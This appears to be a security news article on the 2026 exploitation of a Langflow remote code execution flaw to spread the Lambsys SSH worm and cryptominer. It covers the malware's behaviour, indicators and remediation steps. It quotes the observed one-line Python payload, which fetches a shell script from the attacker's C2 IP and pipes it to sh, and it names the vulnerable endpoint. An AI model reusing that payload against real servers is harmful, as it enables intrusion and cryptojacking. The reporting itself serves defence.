On March 27, 2026, unidentified threat actors began exploiting CVE-2026-33017, an unauthenticated RCE vulnerability in the Langflow AI framework, to deploy Lambsys: a Go-based SSH worm that turns a single prototyping endpoint into an enterprise-wide breach. The campaign lasted 19 days. The lesson lasts much longer.
- The initial payload is a single line of Python executed via
exec()on the/api/v1/build_public_tmp/{flow_id}/flowendpoint, enabled by Langflow's default AUTO_LOGIN - Lambsys terminates 39 competing miner processes, disables AppArmor, SELinux, UFW and iptables, establishes dual-mechanism persistence, and propagates via reused SSH keys
- A variant of the same family was compiled in May 2024: the payload has existed for two years; the AI vector is new
- The CVE is in the CISA KEV catalog with required action by April 8, 2026; the patch is available in Langflow 1.9.0
The Endpoint That Should Not Have Existed
Langflow is a visual prototyping tool for AI/ML flows. Its POST /api/v1/build_public_tmp/{flow_id}/flow endpoint accepts a code parameter containing Python executed directly via exec() without any sandbox. Trend Micro documented this behavior as a server-side RCE primitive.
The default configuration amplifies the problem. AUTO_LOGIN, enabled out of the box, allows an unauthenticated visitor to obtain a superuser token and create public flows on demand. According to Trend Micro researchers Simon Dulude and John Zhang, cited by The Hacker News, "a single line of Python code evaluated inside an unauthenticated Langflow API endpoint pulls down a shell script, fetches a miner binary, and launches it detached."
The specific payload observed: __import__('os').system('curl hxxp[://]83[.]142[.]209[.]214:8080/isp.sh | sh'), with a hardcoded UUID flow_id of 0ee284cc-0eb1-493f-bc60-94fa8d1cfd18. Ten reconnaissance requests from the seed IP earlier the same day preceded the exploit at 19:15:04.
Lambsys' Rigid Sequence
The downloaded binary, lambsys.elf, is a UPX-packed Go executable of approximately 296 KB. Its operational architecture leaves nothing to chance: it terminates 39 competing miner processes belonging to known families (Kinsing, WatchDog, Rocke, Outlaw) and on 13 TCP mining ports, disables security controls, establishes persistence, beacons to C2, and finally propagates.
Defense neutralization is systematic: AppArmor, SELinux, UFW, iptables, NMI watchdog, and Aliyun agent. Persistence relies on two independent mechanisms — a cron job every five minutes and a bash init_rmount loop every sixty seconds — both with re-download capability from the command server.
Lateral propagation exploits SSH key reuse: the malware enumerates ~/.ssh/known_hosts, id_rsa, id_ed25519, and agent sockets to automatically pivot to accessible hosts. The custom XMRig miner, downloaded as ks.tar from C2 83.142.209[.]214 with MD5 verification, connects to pools on TCP/3333 spoofing the user-agent as SystemMonitor/6.25.0.
"Lambsys does not run its attack logic as Go functions. Instead, it forks a cascade of short-lived sh -c subprocesses... The design trades stealth for reliability"
— Trend Micro researchers Simon Dulude and John Zhang, via The Hacker News
19 Days and a Family with History
The observation window documented by Trend Micro spans March 27 to April 15, 2026: eight exploit POSTs from the seed IP, with 43 of 61 requests presenting the user-agent python-requests/2.25.1 and the rest with spoofed UAs. C2 beaconing occurs via JSON POST to /status.php at roughly 128-second intervals.
The most disturbing finding is payload continuity. An artifact of the same Lambsys family, with the same filename and install path, was compiled in May 2024 — more than two years before the Langflow campaign. As the Trend Micro research team observed: "The payloads behind the door have existed, in some cases with the same filename and install path, since at least May 2024. The delivery vector is the only thing that moved."
The vector changed, the malware did not. This is not technical innovation by the operators, but opportunistic repositioning: commodity cryptominer operators now mass-scan exposed AI application endpoints.
What to Do Now
- Update Langflow to version 1.9.0, which fixes CVE-2026-33017 per official release notes and the NVD record
- Disable AUTO_LOGIN in internet-exposed environments, eliminating the unauthenticated attack surface documented by Trend Micro
- Rotate or regenerate SSH keys on hosts that ran vulnerable Langflow versions, given Lambsys' ability to extract and reuse id_rsa, id_ed25519, and agent sockets
- Check for suspicious cron jobs with five-minute intervals and
init_rmountprocesses, documented indicators of the dual-mechanism persistence
The Paradox of the Familiar Vector
While CISOs invest in guardrails, prompt injection defenses, and model alignment, the first significant wave of real-world attacks against AI infrastructure exploits elementary failures: absent authentication, missing sandboxing, insecure default configurations. Langflow is not an isolated case but a sample of a broader class — AI/ML frameworks exposed where prototyping speed preceded security-by-design.
The risk perception gap is structural. AI/ML teams may not consider Langflow a critical attack surface: it is an internal, development, temporary tool. Yet an endpoint with default AUTO_LOGIN and unsandboxed exec() is, technically, an arbitrary remote compute server exposed to the internet. The familiarity of the payload — a commodity cryptominer — combined with the novelty of the vector creates exactly the response delay that operators exploit.
Responsibility for security debt in open-source AI tools still lacks a clear owner: between maintainers prioritizing adoption, vendors not auditing AI dependencies, and teams deploying without hardening, the chain breaks at the point most convenient for the attacker. The 19 days of this campaign suggest that, for now, that point is wide open.
FAQ
- Does Langflow 1.9.0 fully resolve the vulnerability?
- According to the NVD record and Trend Micro analyses, version 1.9.0 contains the fix. The dossier does not specify the presence of bypasses or variants.
- Why does the malware propagate via SSH instead of exploiting other Langflow endpoints?
- Lambsys implements lateral propagation via SSH key reuse as its primary strategy. The dossier does not document alternative movement techniques based on Langflow itself.
- Is the campaign linked to the Sysdig exploit observed on March 20, 2026 on the same CVE?
- The brief documents the same CVE but a different payload: credential harvesting versus cryptominer. No infrastructure overlaps linking the two campaigns emerge at this time.
Sources
- https://thehackernews.com/2026/06/langflow-rce-exploited-to-deploy-monero.html
- https://gbhackers.com/langflow-rce-vulnerability-exploited/
- https://www.trendmicro.com/en/research/26/f/from-langflow-to-monero-inside-cve-2026-33017-cryptominer.html
- https://www.infosecurity-magazine.com/news/hackers-exploit-critical-langflow/
- https://www.trendmicro.com/en_us/research/26/f/from-langflow-to-monero-inside-cve-2026-33017-cryptominer.html
- https://cyberpress.org/ai-powered-ios-applications-exposed/
- https://nvd.nist.gov/vuln/detail/cve-2026-33017
- https://thehackernews.com/
- https://thehackernews.com/p/upcoming-hacker-news-webinars.html
Information verified against cited sources and current as of publication.